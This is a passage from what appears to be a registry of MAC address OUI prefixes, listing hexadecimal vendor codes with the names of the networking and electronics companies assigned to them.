OCP Inc. 00251D DSA Encore, LLC 00250F On-Ramp Wireless, Inc. 0024F5 NDS Surgical Imaging 002467 AOC International (Europe) GmbH 00246D Weinzierl Engineering GmbH 002470 AUROTECH ultrasound AS. 00246A Solid Year Co., Ltd. 002492 Motorola, Broadband Solutions Group 00248B HYBUS CO., LTD. 002484 Bang and Olufsen Medicom a/s 002480 Meteocontrol GmbH 00247A FU YI CHENG Technology Co., Ltd. 002476 TAP.tv 0024B4 ESCATRONIC GmbH 0024B1 Coulomb Technologies 00249C Bimeng Comunication System Co. Ltd 002498 Cisco Systems, Inc 002452 Silicon Software GmbH 002453 Initra d.o.o. 00244C Solartron Metrology Ltd 002448 SpiderCloud Wireless, Inc 00244B PERCEPTRON INC 002428 EnergyICT 002417 Thomson Telecom Belgium 002416 Any Use 00242A Hittite Microwave Corporation 002422 Knapp Logistik Automation GmbH 00241B iWOW Communications Pte Ltd 00245E Hivision Co.,ltd 00244D Hokkaido Electronics Corporation 002442 Axona Limited 002400 Nortel Networks 0023FB IP Datatel, LLC. 002409 The Toro Company 002406 Pointmobile 00243C S.A.A.A. 0023D3 AirLink WiFi Networking Corp. 0023CA Behind The Set, LLC 0023CB Shenzhen Full-join Technology Co.,Ltd 0023AD Xmark Corporation 0023AB Cisco Systems, Inc 0023A4 New Concepts Development Corp. 0023DC Benein, Inc 0023D1 TRG 0023FE Biodevices, SA 0023F4 Masternaut 0023D0 Uniloc USA Inc. 0023C7 AVSystem 0023C3 LogMeIn, Inc. 0023B0 COMXION Technology Inc. 0023E1 Cavena Image Products AB 00237E ELSTER GMBH 00237C NEOTION 00237A RIM 00236D ResMed Ltd 00236B Xembedded, Inc. 002361 Unigen Corporation 00232C Senticare 00232B IRD A/S 002336 METEL s.r.o. 002338 OJ-Electronics A/S 00233B C-Matic Systems Ltd 00232A eonas IT-Beratung und -Entwicklung GmbH 002327 Shouyo Electronics CO., LTD 002328 ALCON TELECOMMUNICATIONS CO., LTD. 002372 MORE STAR INDUSTRIAL GROUP LIMITED 00234C KTC AB 002343 TEM AG 00235F Silicon Micro Sensors GmbH 002385 ANTIPODE 0022D8 Shenzhen GST Security and Safety Technology Limited 0022DC Vigil Health Solutions Inc. 0022D9 Fortex Industrial Ltd. 0022D3 Hub-Tech 0022D4 ComWorth Co., Ltd. 0022FE Advanced Illumination 002300 Cayee Computer Ltd. 0022F3 SHARP Corporation 0022F6 Syracuse Research Corporation 00230D Nortel Networks 002303 LITE-ON IT Corporation 0022ED TSI Power Corporation 0022E1 ZORT Labs, LLC. 0022E0 Atlantic Software Technologies S.r.L. 0022DF TAMUZ Monitors 00231A ITF Co., Ltd. 0022BC JDSU France SAS 0022AA Nintendo Co., Ltd. 0022C9 Lenord, Bauer & Co GmbH 00228C Photon Europe GmbH 00228B Kensington Computer Products Group 00228D GBS Laboratories LLC 00224C Nintendo Co., Ltd. 00224A RAYLASE AG 00224B AIRTECH TECHNOLOGIES, INC. 002256 Cisco Systems, Inc 002252 ZOLL Lifecor Corporation 00224D MITAC INTERNATIONAL CORP. 00229F Sensys Traffic AB 002299 SeaMicro Inc. 00226D Shenzhen GIEC Electronics Co., Ltd. 00226E Gowell Electronic Limited 00225D Digicable Network India Pvt. Ltd. 00227B Apogee Labs, Inc. 002289 Vandelrande APC inc. 00227D YE DATA INC. 0022A8 Ouman Oy 002223 TimeKeeping Systems, Inc. 00221A Audio Precision 002218 AKAMAI TECHNOLOGIES INC 00223C RATIO Entwicklungen GmbH 0021E7 Informatics Services Corporation 0021DC TECNOALARM S.r.l. 0021F1 Tutus Data AB 0021E3 SerialTek LLC 00221C Private 002222 Schaffner Deutschland GmbH 0021F8 Enseo, Inc. 0021F3 Si14 SpA 002231 SMT&C Co., Ltd. 002213 PCI CORPORATION 002201 Aksys Networks Inc 00217B Bastec AB 002176 YMax Telecom Ltd. 002171 Wesung TNC Co., Ltd. 002193 Videofon MV 002192 Baoding Galaxy Electronic TechnologyCo.,Ltd 0021A7 Hantle System Co., Ltd. 00219C Honeywld Technology Corp. 00219A Cambridge Visual Networks Ltd 0021D8 Cisco Systems, Inc 0021D7 Cisco Systems, Inc 0021D9 SEKONIC CORPORATION 0021DA Automation Products Group Inc. 0021B5 Galvanic Ltd 0021BD Nintendo Co., Ltd. 0021C4 Consilium AB 002189 AppTech, Inc. 002122 Chip-pro Ltd. 002125 KUK JE TONG SHIN Co.,LTD 002126 Shenzhen Torch Equipment Co., Ltd. 002113 Padtec S/A 002112 WISCOM SYSTEM CO.,LTD 00210E Orpak Systems L.T.D. 002161 Yournet Inc. 00215F IHSE GmbH 002135 ALCATEL-LUCENT 002138 Cepheid 002147 Nintendo Co., Ltd. 002149 China Daheng Group ,Inc. 002156 Cisco Systems, Inc 002151 Millinet Co., Ltd. 00216C ODVA 00211C Cisco Systems, Inc 002118 Athena Tech, Inc. 001FBD Kyocera Wireless Corp. 001FB9 Paltronics 001FB7 WiMate Technologies Corp. 001FB4 SmartShare Systems 001FB6 Chi Lin Technology Co., Ltd. 001FC8 Up-Today Industrial Co., Ltd. 001FC5 Nintendo Co., Ltd. 001FC0 Control Express Finland Oy 001FBC EVGA Corporation 001FF9 Advanced Knowledge Associates 001FED Tecan Systems Inc. 001FE5 In-Circuit GmbH 001FF4 Power Monitors, Inc. 001F5F Blatand GmbH 001F57 Phonik Innovation Co.,LTD 001F59 Kronback Tracers 001F4E ConMed Linvatec 001FAA Taseon, Inc. 001F7B TechNexion Ltd. 001F7D Embedded Wireless GmbH 001F8D Ingenieurbuero Stark GmbH und Ko. KG 001FAF NextIO, Inc. 001F74 Eigen Development 001F75 GiBahn Media 001F8F Shanghai Bellmann Digital Source Co.,Ltd. 001F84 Gigle Semiconductor 001F6E Vtech Engineering Corporation 001F66 PLANAR LLC 001FA0 A10 Networks 001F9E Cisco Systems, Inc 001EE6 Shenzhen Advanced Video Info-Tech Co., Ltd. 001EF7 Cisco Systems, Inc 001F0B Federal State Unitary Enterprise Industrial UnionElectropribor 001F0C Intelligent Digital Services GmbH 001F08 RISCO LTD 001F43 ENTES ELEKTRONIK 001F14 NexG 001EF1 Servimat 001EF4 L-3 Communications Display Systems 001EF5 Hitek Automated Inc. 001F0E Japan Kyastem Co., Ltd 001F28 HPN Supply Chain 001F1E Astec Technology Co., Ltd 001F4A Albentia Systems S.A. 001EAA E-Senza Technologies GmbH 001E9C Fidustron INC 001E97 Medium Link System Technology CO., LTD, 001E8B Infra Access Korea Co., Ltd. 001EBB BLUELIGHT TECHNOLOGY INC. 001EB5 Ever Sparkle Technologies Ltd 001EB3 Primex Wireless 001E85 Lagotek Corporation 001ED8 Digital United Inc. 001ED6 Alentec & Orion AB 001EC6 Obvius Holdings LLC 001EC4 Celio Corp 001EC1 3COM EUROPE LTD 001EB6 TAG Heuer SA 001EAC Armadeus Systems 001E77 Air2App 001E7B R.I.CO. S.r.l. 001E6E Shenzhen First Mile Communications Ltd 001E6D IT R&D Center 001E34 CryptoMetrics 001E2D STIM 001E41 Microwave Communication & Component, Inc. 001DFC KSIC 001E55 COWON SYSTEMS,Inc. 001E56 Bally Wulff Entertainment GmbH 001E3F TrellisWare Technologies, Inc. 001E57 ALCOMA, spol. s r.o. 001E50 BATTISTONI RESEARCH 001E11 ELELUX INTERNATIONAL LTD 001DF2 Netflix, Inc. 001DEF TRIMM, INC. 001DF1 Intego Systems, Inc. 001DED Grid Net, Inc. 001DC3 RIKOR TV, Ltd 001DC1 Audinate Pty L 001DB2 HOKKAIDO ELECTRIC ENGINEERING CO.,LTD. 001DAD Sinotech Engineering Consultants, Inc.Geotechnical Enginee 001DAB SwissQual License AG 001D9C Rockwell Automation 001DA0 Heng Yu Electronic Manufacturing Company Limited 001DD8 Microsoft Corporation 001DC8 Navionics Research Inc., dba SCADAmetrics 001DCC Ayon Cyber Security, Inc 001D92 MICRO-STAR INT'L CO.,LTD. 001D8A TechTrex Inc 001D80 Beijing Huahuan Eletronics Co.,Ltd 001D83 Emitech Corporation 001D74 Tianjin China-Silicon Microelectronics Co., Ltd. 001D4B Grid Connect Inc. 001D4D Adaptive Recognition Hungary, Inc 001D1E KYUSHU TEN CO.,LTD 001D1D Inter-M Corporation 001D0E Agapha Technology co., Ltd. 001D0A Davis Instruments, Inc. 001D67 AMEC 001D7C ABE Elettronica S.p.A. 001D6D Confidant International LLC 001D75 Radioscape PLC 001D53 S&O Electronics (Malaysia) Sdn. Bhd. 001D54 Sunnic Technology & Merchandise INC. 001D5F OverSpeed SARL 001D58 CQ Inc 001D87 VigTech Labs Sdn Bhd 001D2F QuantumVision Corporation 001CE5 MBS Electronic Systems GmbH 001CDD COWBELL ENGINEERING CO., LTD. 001CC2 Part II Research, Inc. 001CBD Ezze Mobile Tech., Inc. 001CB8 CBC Co., Ltd 001CAC Qniq Technology Corp. 001CA5 Zygo Corporation 001C9D Liecthi AG 001CFF Napera Networks Inc 001CDC Custom Computer Services, Inc. 001CD1 Waves Audio LTD 001CED ENVIRONNEMENT SA 001CBA VerScient, Inc. 001CB0 Cisco Systems, Inc 001C4C Petrotest Instruments 001C45 Chenbro Micom Co., Ltd. 001C3C Seon Design Inc. 001C57 Cisco Systems, Inc 001C5D Leica Microsystems 001C5E ASTON France 001C55 Shenzhen Kaifa Technology Co. 001C5B Chubb Electronic Security Systems Ltd 001C44 Bosch Security Systems BV 001C82 Genew Technologies 001C84 STL Solution Co.,Ltd. 001C79 Cohesive Financial Technologies LLC 001C64 Landis+Gyr 001C31 Mobile XP Technology Co., LTD 001C8B MJ Innovations Ltd. 001C6D KYOHRITSU ELECTRONIC INDUSTRY CO., LTD. 001C96 Linkwise Technology Pte Ltd 001C29 CORE DIGITAL ELECTRONICS CO., LTD 001C24 Formosa Wireless Systems Corp. 001C20 CLB Benelux 001C1C Center Communication Systems GmbH 001BDA UTStarcom Inc 001BD1 SOGESTMATIC 001C00 Entry Point, LLC 001BFD Dignsys Inc. 001BD6 Kelvin Hughes Ltd 001BCF Dataupia Corporation 001BCB PEMPEK SYSTEMS PTY LTD 001BF5 Tellink Sistemas de Telecomunicación S.L. 001BE6 VR AG 001BE2 AhnLab,Inc. 001BE0 TELENOT ELECTRONIC GmbH 001C34 HUEY CHIAO INTERNATIONAL CO., LTD. 001C36 iNEWiT NV 001C15 iPhotonix LLC 001C07 Cwlinux Limited 001BA3 Flexit Group GmbH 001B9F Calyptech Pty Ltd 001B9A Apollo Fire Detectors Ltd 001BBD FMC Kongsberg Subsea AS 001BBE ICOP Digital 001BB3 Condalo GmbH 001BB7 Alta Heights Technology Corp. 001B99 KS System GmbH 001B8F Cisco Systems, Inc 001B8C JMicron Technology Corp. 001B91 EFKON AG 001B82 Taiwan Semiconductor Co., Ltd. 001B89 EMZA Visual Sense Ltd. 001B8B NEC Platforms, Ltd. 001BAC Curtiss Wright Controls Embedded Computing 001B6A Powerwave Technologies Sweden AB 001B67 Cisco Systems Inc 001B7B The Tintometer Ltd 001B75 Hypermedia Systems 001B27 Merlin CSI 001B1B Siemens AG, 001B1F DELTA - Danish Electronics, Light & Acoustics 001B57 SEMINDIA SYSTEMS PRIVATE LIMITED 001B55 Hurco Automation Ltd. 001B53 Cisco Systems, Inc 001B49 Roberts Radio limited 001B0E InoTec GmbH Organisationssysteme 001B04 Affinity International S.p.a 001B06 Ateliers R. LAUMONIER 001B31 Neural Image. Co. Ltd. 001B29 Avantis.Co.,Ltd 001B2B Cisco Systems, Inc 001B28 POLYGON, JSC 001B43 Beijing DG Telecommunications equipment Co.,Ltd 001B3C Software Technologies Group,Inc. 001B3D EuroTel Spa 001B66 Sennheiser electronic GmbH & Co. KG 001B60 NAVIGON AG 001B05 YMC AG 001AFF Wizyoung Tech. 001B00 Neopost Technologies 001B4E Navman New Zealand 001B16 Celtro Ltd. 001AE6 Atlanta Advanced Communications Holdings Limited 001AD9 International Broadband Electric Communications, Inc. 001AC8 ISL (Instrumentation Scientifique de Laboratoire) 001AAB eWings s.r.l. 001AAC Corelatus AB 001AAF BLUSENS TECHNOLOGY 001AB0 Signal Networks Pvt. Ltd., 001AA1 Cisco Systems, Inc 001AC6 Micro Control Designs 001AF2 Dynavisions Schweiz AG 001A82 PROBA Building Automation Co.,LTD 001A7C Hirschmann Multimedia B.V. 001A7A Lismore Instruments Limited 001A78 ubtos 001A76 SDT information Technology Co.,LTD. 001A70 Cisco-Linksys, LLC 001A61 PacStar Corp. 001A62 Data Robotics, Incorporated 001A65 Seluxit 001A54 Hip Shing Electronics Ltd. 001A42 Techcity Technology co., Ltd. 001A50 PheeNet Technology Corp. 001A53 Zylaya 001A4C Crossbow Technology, Inc 001A1A Gentex Corporation/Electro-Acoustic Products 001A12 Essilor 001A7D cyber-blue(HK)Ltd 001A60 Wave Electronics Co.,Ltd. 001A56 ViewTel Co,. Ltd. 0019F3 Cetis, Inc 0019EF SHENZHEN LINNKING ELECTRONICS CO.,LTD 0019F7 Onset Computer Corporation 0019EE CARLO GAVAZZI CONTROLS SPA-Controls Division 0019BF Citiway technology Co.,ltd 0019B6 Euro Emme s.r.l. 0019EB Pyronix Ltd 0019E7 Cisco Systems, Inc 0019E9 S-Information Technolgy, Co., Ltd. 0019DA Welltrans O&E Technology Co. , Ltd. 001A14 Xin Hua Control Engineering Co.,Ltd. 001A10 LUCENT TRANS ELECTRONICS CO.,LTD 001A0C Swe-Dish Satellite Systems AB 0019DC ENENSYS Technologies 0019D0 Cathexis 0019D6 LS Cable and System Ltd. 0019D7 FORTUNETEK CO., LTD 001A02 SECURE CARE PRODUCTS, INC 0019F8 Embedded Systems Design, Inc. 001A07 Arecont Vision 001A08 Simoco Ltd. 001A04 Interay Solutions BV 0019C9 S&C ELECTRIC COMPANY 0019B5 Famar Fueguina S.A. 0019B8 Boundary Devices 00195D ShenZhen XinHuaTong Opto Electronics Co.,Ltd 001953 Chainleader Communications Corp. 001955 Cisco Systems, Inc 001959 Staccato Communications Inc. 00194D Avago Technologies Sdn Bhd 00194E Ultra Electronics - TCS (Tactical Communication Systems) 0019AC GSP SYSTEMS Inc. 0019B0 HanYang System 001995 Jurong Hi-Tech (Suzhou)Co.ltd 00199A EDO-EVI 001994 Jorjin Technologies Inc. 00197C Riedel Communications GmbH 0019A0 NIHON DATA SYSTENS, INC. 001991 avinfo 00198C iXSea 001962 Commerciant, LP 00196F SensoPart GmbH 0018DD Silicondust Engineering Ltd 0018DF The Morey Corporation 0018E1 Verkerk Service Systemen 0018DA Würth Elektronik eiSos GmbH & Co. KG 0018D5 REIGNCOM 0018E7 Cameo Communications, INC. 0018E4 YIGUANG 0018E5 Adhoco AG 00190A HASWARE INC. 001923 Phonex Korea Co., LTD. 00191C Sensicast Systems 001928 Siemens AG, Transportation Systems 001915 TECOM Co., Ltd. 00191B Sputnik Engineering AG 001909 DEVI - Danfoss A/S 001933 Strix Systems, Inc. 001904 WB Electronics Sp. z o.o. 001934 TRENDON TOUCH TECHNOLOGY CORP. 00190D IEEE 1394c 001881 Buyang Electronics Industrial Co., Ltd 001876 WowWee Ltd. 00187A Wiremold 00186C Neonode AB 001873 Cisco Systems, Inc 00185F TAC Inc. 0018D4 Unified Display Interface SIG 0018A7 Yoggie Security Systems LTD. 0018A2 XIP Technology AB 00189C Weldex Corporation 00189A HANA Micron Inc. 001864 Eaton Corporation 001866 Leutron Vision 001860 SIM Technology Group Shanghai Simcom Ltd., 001897 JESS-LINK PRODUCTS Co., LTD 00189E OMNIKEY GmbH. 0018A9 Ethernet Direct Corporation 0018A8 AnNeal Technology Inc. 0018C2 Firetide, Inc 00183E Digilent, Inc 001842 Nokia Danmark A/S 001840 3 Phoenix, Inc. 001844 Heads Up Technologies, Inc. 001821 SINDORICOH 001823 Delta Electronics, Inc. 001815 GZ Technologies, Inc. 001857 Unilever R&D 001853 Atera Networks LTD. 001859 Strawberry Linux Co.,Ltd. 00184F 8 Ways Technology Corp. 001806 Hokkei Industries Co., Ltd. 001818 Cisco Systems, Inc 00181A AVerMedia Information Inc. 001816 Ubixon Co., Ltd. 00182B Softier 001829 Gatsometer 001838 PanAccess Communications,Inc. 0017F0 SZCOM Broadband Network Technology Co.,Ltd 0017F1 Renu Electronics Pvt Ltd 0017FF PLAYLINE Co.,Ltd. 0017F6 Pyramid Meriden Inc. 0017C5 SonicWALL 0017BE Tratec Telecom B.V. 0017C0 PureTech Systems, Inc. 0017BA SEDO CO., LTD. 0017D4 Monsoon Multimedia, Inc 001780 Applied Biosystems B.V. 0017A5 Ralink Technology Corp 0017A8 EDM Corporation 0017A9 Sentivision 0017AF Enermet 0017AA elab-experience inc. 0017AE GAI-Tronics 0017B5 Peerless Systems Corporation 00176C Pivot3, Inc. 001770 Arti Industrial Electronics Ltd. 00178B Teledyne Technologies Incorporated 0017DF Cisco Systems, Inc 001746 Freedom9 Inc. 00174D DYNAMIC NETWORK FACTORY, INC. 001744 Araneo Ltd. 001749 HYUNDAE YONG-O-SA CO.,LTD 001743 Deck Srl 001728 Selex Communications 001722 Hanazeder Electronic GmbH 00173D Neology 001740 Bluberi Gaming Technologies Inc 001732 Science-Technical Center RISSA 00176D CORE CORPORATION 001773 Laketune Technologies Co. Ltd 00173A Cloudastructure Inc 00172F NeuLion Incorporated 001723 Summit Data Communications 00171F IMV Corporation 001753 nFore Technology Inc. 001757 RIX TECHNOLOGY LIMITED 0016BB Law-Chain Computer Technology Co Ltd 0016B4 Private 0016A7 AWETA G&P 001710 Casa Systems Inc. 0016BF PaloDEx Group Oy 0016B7 Seoul Commtech 0016E1 SiliconStor, Inc. 0016E2 American Fibertek, Inc. 001713 Tiger NetCom 0016CD HIJI HIGH-TECH CO., LTD. 0016EF Koko Fitness, Inc. 0016FD Jaty Electronics 001678 SHENZHEN BAOAN GAOKE ELECTRONICS CO., LTD 001674 EuroCB (Phils.), Inc. 001670 SKNET Corporation 001689 Pilkor Electronics Co., Ltd 00168A id-Confirm Inc 001686 Karl Storz Imaging 00168D KORWIN CO., Ltd. 00168E Vimicro corporation 00164F World Ethnic Broadcastin Inc. 00167E DIBOSS.CO.,LTD 00167B Haver&Boecker 001679 eOn Communications 0016A3 Ingeteam Transmission&Distribution, S.A. 0016A0 Auto-Maskin 00165D AirDefense, Inc. 00165B Grip Audio 001667 A-TEC Subsystem INC. 00164A Vibration Technology Limited 001645 Power Distribution, Inc. 00163F CReTE SYSTEMS Inc. 00163D Tsinghua Tongfang Legend Silicon Tech. Co., Ltd. 00162D STNet Co., Ltd. 001627 embedded-logic DESIGN AND MORE GmbH 00163A YVES TECHNOLOGY CO., LTD. 001638 TECOM Co., Ltd. 001633 Oxford Diagnostics Ltd. 0015EC Boca Devices LLC 0015EF NEC TOKIN Corporation 0015E4 Zimmer Elektromedizin 001622 BBH SYSTEMS GMBH 001613 LibreStream Technologies Inc. 00160F BADGER METER INC 001604 Sigpro 0015FB setex schermuly textile computer gmbh 0015FE SCHILLING ROBOTICS LLC 00160D Be Here Corporation 0015C9 Gumstix, Inc 0015BA iba AG 0015BB SMA Solar Technology AG 0015BF technicob 001582 Pulse Eight Limited 00157B Leuze electronic GmbH + Co. KG 001578 Audio / Video Innovations 0015AE kyung il 0015BC Develco 0015BD Group 4 Technology Ltd 0015B5 CI Network Corp. 0015CD Exartech International Corp. 0015D9 PKC Electronics Oy 0015DD IP Control Systems Ltd. 00159C B-KYUNG SYSTEM Co.,Ltd. 001595 Quester Tangent Corporation 001587 Takenaka Seisakusho Co.,Ltd 00151A Hunter Engineering Company 001514 Hu Zhou NAVA Networks&Electronics Ltd. 001516 URIEL SYSTEMS INC. 001545 SEECODE Co., Ltd. 001543 Aberdeen Test Center 001541 StrataLight Communications, Inc. 001569 PECO II, Inc. 001564 BEHRINGER Spezielle Studiotechnik GmbH 001563 Cisco Systems, Inc 001561 JJPlus Corporation 001571 Nolan Systems 001565 XIAMEN YEALINK NETWORK TECHNOLOGY CO.,LTD 001538 RFID, Inc. 00152E PacketHop, Inc. 001558 FOXCONN 00151F Multivision Intelligent Surveillance (Hong Kong) Ltd 001522 Dea Security 00154F one RF Technology 001501 LexBox 0014A3 Vitelec BV 001497 ZHIYUAN Eletronics co.,ltd. 001499 Helicomm Inc 001492 Liteon, Mobile Media Solution SBU 001494 ESU AG 0014EF TZero Technologies, Inc. 0014BC SYNECTIC TELECOM EXPORTS PVT. LTD. 0014B9 MSTAR SEMICONDUCTOR 0014BD incNETWORKS, Inc 0014B7 AR Infotek Inc. 0014CA Key Radio Systems Limited 0014C8 Contemporary Research Corp 0014C5 Alive Technologies Pty Ltd 0014DA Huntleigh Healthcare 0014D5 Datang Telecom Technology CO. , LCD,Optical Communication Br 0014D3 SEPSA 0014D8 bio-logic SA 0014EE Western Digital Technologies, Inc. 0014B5 PHYSIOMETRIX,INC 00149C HF Company 00145C Intronics B.V. 00145A Neratec Solutions AG 00145B SeekerNet Inc. 001449 Sichuan Changhong Electric Ltd. 001446 SuperVision Solutions LLC 001440 ATOMIC Corporation 00142E 77 Elektronika Kft. 001430 ViPowER, Inc 001432 Tarallax Wireless, Inc. 001485 Giga-Byte 001483 eXS Inc. 001471 Eastern Asia Technology Limited 00146A Cisco Systems, Inc 00144C General Meters Corp. 001443 Consultronics Europe Ltd 001460 Kyocera Wireless Corp. 0013F5 Akimbi Systems 0013F1 AMOD Technology Co., Ltd. 0013E7 Halcro 0013EA Kamstrup A/S 0013E1 Iprobe AB 0013E3 CoVi Technologies, Inc. 0013E4 YANGJAE SYSTEMS CORP. 0013C1 Asoka USA Corporation 0013C0 Trix Tecnologia Ltda. 00141F SunKwang Electronics Co., Ltd 00141D LTI-Motion GmbH 001412 S-TEC electronics AG 001411 Deutschmann Automation GmbH & Co. KG 001405 OpenIB, Inc. 004501 Midmark RTLS 001403 Renasis, LLC 001401 Rivertree Networks Corp. 0013D9 Matrix Product Development, Inc. 0013CC Tall Maple Systems 001394 Infohand Co.,Ltd 001389 Redes de Telefonía Móvil S.A. 00138C Kumyoung.Co.Ltd 0013A1 Crow Electronic Engeneering 00139C Exavera Technologies, Inc. 001355 TOMEN Cyber-business Solutions, Inc. 001357 Soyal Technology Co., Ltd. 001360 Cisco Systems, Inc 00138E FOAB Elektronik AB 001376 Tabor Electronics Ltd. 00135D NTTPC Communications, Inc. 001352 Naztec, Inc. 00136C TomTom 001364 Paradigm Technology Inc.. 00136B E-TEC 001380 Cisco Systems, Inc 001385 Add-On Technology Co., LTD. 0013B3 Ecom Communications Technology Co., Ltd. 0013B7 Scantech ID 001308 Nuvera Fuel Cells 001307 Paravirtual Corporation 0012FC PLANET System Co.,LTD 0012FE Lenovo Mobile Communication Technology Ltd. 0012EC Movacolor b.v. 0012EB PDH Solutions, LLC 001343 Matsushita Electronic Components (Europe) GmbH 00133E MetaSwitch 001345 Eaton Corporation 001347 Red Lion Controls, LP 00132E ITian Coporation 001339 CCV Deutschland GmbH 001329 VSST Co., LTD 00132B Phoenix Digital 00130B Mextal B.V. 00130D GALILEO AVIONICA 0012F7 Xiamen Xinglian Electronics Co., Ltd. 00131B BeCell Innovations Corp. 0012E2 ALAXALA Networks Corporation 0012DF Novomatic AG 0012D4 Princeton Technology, Ltd 0012D9 Cisco Systems, Inc 0012C2 Apex Electronics Factory 0012BE Astek Corporation 0012E1 Alliant Networks, Inc 0012C5 V-ShowTechnology (China) Co.,Ltd 0012AD IDS GmbH 0012A0 NeoMeridian Sdn Bhd 001286 ENDEVCO CORP 001263 Data Voice Technologies GmbH 001270 NGES Denro Systems 00126E Seidel Elektronik GmbH Nfg.KG 00126F Rayson Technology Co., Ltd. 00125C Green Hills Software, Inc. 00125F AWIND Inc. 00122D SiNett Corporation 001274 NIT lab 001253 AudioDev AB 00124C BBWM Corporation 001255 NetEffect Incorporated 001244 Cisco Systems, Inc 00122C Soenen Controls N.V. 00122B Virbiage Pty Ltd 001232 LeWiz Communications Inc. 001227 Franklin Electric Co., Inc. 00121A Techno Soft Systemnics Inc. 00121B Sound Devices, LLC 0011DF Current Energy 0011D7 eWerks Inc 001204 u10 Networks, Inc. 00120A Emerson Climate Technologies GmbH 001208 Gantner Instruments GmbH 001201 Cisco Systems, Inc 0011EE Estari, Inc. 001200 Cisco Systems, Inc 0011E5 KCodes Corporation 0011DE EURILOGIC 0011C8 Powercom Co., Ltd. 0011B8 Liebherr - Elektronik GmbH 0011B4 Westermo Network Technologies AB 001178 Chiron Technology Ltd 00116A Domo Ltd 001193 Cisco Systems, Inc 00118C Missouri Department of Transportation 00118E Halytech Mace 001186 Prime Systems, Inc. 001183 Datalogic ADC, Inc. 00117D ZMD America, Inc. 00117F Neotune Information Technology Corporation,.LTD 00119D Diginfo Technology Corporation 00119C EP&T Energy 00119A Alkeria srl 0011C1 4P MOBILE DATA PROCESSING 0011B2 2001 Technology Inc. 0011AF Medialink-i,Inc 00115E ProMinent Dosiertechnik GmbH 00117C e-zy.net 001139 STOEBER ANTRIEBSTECHNIK GmbH + Co. KG. 00113E JL Corporation 001138 TAISHIN CO., LTD. 001136 Goodrich Sensor Systems 001132 Synology Incorporated 00114B Francotyp-Postalia GmbH 001147 Secom-Industry co.LTD. 00114A KAYABA INDUSTRY Co,.Ltd. 001142 e-SMARTCOMINC. 001120 Cisco Systems, Inc 001118 BLX IC Design Corp., Ltd. 001107 RGB Networks Inc. 001108 Orbital Data Corporation 00110C Atmark Techno, Inc. 00114D Atsumi Electric Co.,LTD. 001130 Allied Telesis (Hong Kong) Ltd. 001129 Paradise Datacom Ltd. 001157 Oki Electric Industry Co., Ltd. 000FD9 FlexDSL Telecommunications AG 000FD0 ASTRI 000FCA A-JIN TECHLINE CO, LTD 000FEC ARKUS Inc. 000FED Anam Electronics Co., Ltd 000FE5 MERCURY SECURITY CORPORATION 000FAE E2O Communications 000FB1 Cognio Inc. 000FA7 Raptor Networks Technology 000FF0 Sunray Co. Ltd. 001103 kawamura electric inc. 000FDD SORDIN AB 000FC3 PalmPalm Technology, Inc. 000F88 AMETEK, Inc. 000F7E Ablerex Electronics Co., LTD 000F83 Brainium Technologies Inc. 000F84 Astute Networks, Inc. 000F5C Day One Digital Media Limited 000F52 YORK Refrigeration, Marine & Controls 000F4C Elextech INC 000F93 Landis+Gyr Ltd. 000F94 Genexis BV 000F6C ADDI-DATA GmbH 000F8F Cisco Systems, Inc 000F7D Xirrus 000F76 Digital Keystone, Inc. 000F9E Murrelektronik GmbH 000F79 Bluetooth Interest Group Inc. 000F17 Insta Elektro GmbH 000F1E Chengdu KT Electric Co.of High & New Technology 000F15 Icotera A/S 000F39 IRIS SENSORS 000F3E CardioNet, Inc 000F3F Big Bear Networks 000F35 Cisco Systems, Inc 000F36 Accurate Techhnologies, Inc. 000F28 Itronix Corporation 000F23 Cisco Systems, Inc 000F22 Helius, Inc. 000F24 Cisco Systems, Inc 000EFC JTAG Technologies B.V. 000EFE EndRun Technologies LLC 000F2C Uplogix, Inc. 000F2B GREENBELL SYSTEMS 000EF2 Infinico Corporation 000F0D Hunt Electronic Co., Ltd. 000F08 Indagon Oy 000F04 cim-usa inc 000F42 Xalyo Systems 000EA5 BLIP Systems 000EA0 NetKlass Technology Inc. 000EE4 BOE TECHNOLOGY GROUP CO.,LTD 000EDE REMEC, Inc. 000E9C Benchmark Electronics 000E9A BOE TECHNOLOGY GROUP CO.,LTD 000E90 PONICO CORP. 000E8A Avara Technologies Pty. Ltd. 000EB8 Iiga co.,Ltd 000EBE B&B Electronics Manufacturing Co. 000EBB Everbee Networks 000ECE S.I.T.T.I. S.p.A. 000ED4 CRESITT INDUSTRIE 000ED6 Cisco Systems, Inc 000ED8 Positron Access Solutions Corp 000ED1 Osaka Micro Computer. 000EB0 Solutions Radio BV 000E83 Cisco Systems, Inc 000E81 Devicescape Software, Inc. 000E88 VIDEOTRON CORP. 000E86 Alcatel North America 000E69 China Electric Power Research Institute 000E61 MICROTROL LIMITED 000E64 Elphel, Inc 000E49 Forsway Scandinavia AB 000E42 Motic Incoporation Ltd. 000E3D Televic N.V. 000E39 Cisco Systems, Inc 000E34 NexGen City, LP 000E6A 3Com Ltd 000E5A TELEFIELD inc. 000E5D Triple Play Technologies A/S 000E52 Optium Corporation 000E7E ionSign Oy 000E77 Decru, Inc. 000E4D Numesa Inc. 000E4C Bermai Inc. 000E2D Hyundai Digital Technology Co.,Ltd. 000E30 AERAS Networks, Inc. 000E29 Shester Communications Inc 000DE1 Control Products, Inc. 000DD0 TetraTec Instruments GmbH 000DD3 SAMWOO Telecommunication Co.,Ltd. 000DD8 BBN 000DB3 SDO Communication Corperation 000DAE SAMSUNG HEAVY INDUSTRIES CO., LTD. 000DB2 Ammasso, Inc. 000E0D Hesch Schröder GmbH 000DF6 Technology Thesaurus Corp. 000DFF CHENMING MOLD INDUSTRY CORP. 000DC7 COSMIC ENGINEERING INC. 000DC2 Private 000DBF TekTone Sound & Signal Mfg., Inc. 000E19 LogicaCMG Pty Ltd 000E1A JPS Communications 000E06 Team Simoco Ltd 000D5C Robert Bosch GmbH, VT-ATMO 000D60 IBM Corp 000D67 Ericsson 000D5F Minds Inc 000D9C Elan GmbH & Co KG 000D98 S.W.A.C. Schmitt-Walter Automation Consult GmbH 000D8C Shanghai Wedone Digital Ltd. CO. 000D94 AFAR Communications,Inc 000DAA S.A.Tehnology co.,Ltd. 000DA6 Universal Switching Corporation 000D8D Prosoft Technology, Inc 000D84 Makus Inc. 000D73 Technical Support, Inc. 000D69 TMT&D Corporation 000DA2 Infrant Technologies, Inc. 000D68 Vinci Systems, Inc. 000D64 COMAG Handels AG 000D74 Sand Network Systems, Inc. 000D7D Afco Systems 000D54 3Com Ltd 000D4C Outline Electronics Ltd. 000D0F Finlux Ltd 000D12 AXELL Corporation 000D34 Shell International Exploration and Production, Inc. 000D32 DispenseSource, Inc. 000CF6 Sitecom Europe BV 